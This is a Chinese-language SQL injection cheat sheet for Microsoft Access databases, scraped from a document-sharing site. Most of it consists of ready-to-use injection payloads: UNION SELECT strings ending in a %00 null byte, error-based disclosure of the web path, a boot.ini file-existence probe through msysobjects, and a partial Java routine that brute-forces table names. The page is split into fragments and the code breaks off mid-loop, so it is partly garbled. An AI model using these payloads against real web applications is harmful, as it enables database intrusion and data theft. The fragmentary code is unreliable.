accesssql注入参考

《accesssql注入参考》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、AccessSQL注入参考描述SQL查询及注释注释符Access中没有专门的注释符号.因此"/*","--"和"#"都没法使用.但是可以使用空字符"NULL"(%00)代替:·'UNIONSELECT1,1,1FROMvalidTableName%00语法错误信息"[Microsoft][DriverODBCMicrosoftAccess]"多句执行不支持.联合查询Access支持联合查询,UNION后的FROM关键字必须使用一个已经存在的表名.附属查询Access支持附属查询(例如:"TOP1"用来返回第

2、一行的内容):·'AND(SELECTTOP1'someData'FROMvalidTableName)%00LIMIT支持LIMIT不被支持,但是在查询中可以声明"TOPN"来限制返回内容的行数:·'UNIONSELECTTOP3AttrNameFROMvalidTableName%00:这条语句返回(前)3行.让查询返回0行在脚本在返回的HTML结果中只显示第一个查询的结果的时候非常有用:·'AND1=0UNIONSELECTAttrName1,AttrName2FROMvalidTableName%0

3、0字符串连接不支持CONCAT()函数.可以使用"&"或"+"操作来俩接两个字符串.在使用的时侯必须对这两个操作符进行URLencode编码:·'UNIONSELECT'web'%2b'app'FROMvalidTableName%00:返回"webapp"·'UNIONSELECT'web'%26'app'FROMvalidTableName%00:返回"webapp"子字符串MID()函数:·'UNIONSELECTMID('abcd',1,1)FROMvalidTableName%00:返回"a"·'

4、UNIONSELECTMID('abcd',2,1)FROMvalidTableName%00:返回"b"字符串长度LEN()函数:·'UNIONSELECTLEN('1234')FROMvalidTableName%00:返回4暴WEB路径可以通过对一个不存在的库进行SELECT操作.Access将会回应一条包含有完整路径的错误信息.:·'UNIONSELECT1FROMThisIsAFakeName.FakeTable%00取字符的ASCII值ASC()函数:·'UNIONSELECTASC('A')F

5、ROMValidTable%00:返回65('A'的ASCII值)ASCII值转换为字符CHR()函数:·'UNIONSELECTCHR(65)FROMvalidTableName%00:返回'A'IF语句可以使用IIF()函数.语法:IIF(condition,true,false):·'UNIONSELECTIIF(1=1,'a','b')FROMvalidTableName%00:返回'a'时间接口不存在类似BENCHMARK()或SLEEP()的函数,但是可以使用大量(高负载)的查询来达到这个效果.

6、点击这里查看参考.验证文件是否存在在注入的时候使用:·'UNIONSELECTnameFROMmsysobjectsIN'boot.ini'%00:(如果文件存在)将会获得一条错误信息:itinformsthatthedatabaseformatwasnotrecognized.表名猜解这里有一个简单的猜解access表名的java代码.我写他是为了更好的解释猜解表名的原理:staticprivateStringcolumnErrorMessage="...";staticprivateStringacc

7、essError="...";[...]publicStringbruteTableName(Requestr){//0Stringresp=newString();String[]table={"tab_name1","tab_name2",...,"tab_nameN"};//1for(inti=0;i

8、ErrorMessage)

9、

10、!resp.contains(accessError))//3returntable[i];}returnnull;}bruteTableName()的参数是一个名为"Request"的对象(见注释0).这个例子靠sendInjection()(见注释2)尝试检测查询:·'UNIONSELECT1FROMtable[i]%00table[i]是表名列表中的一个元素(见注释1).你能在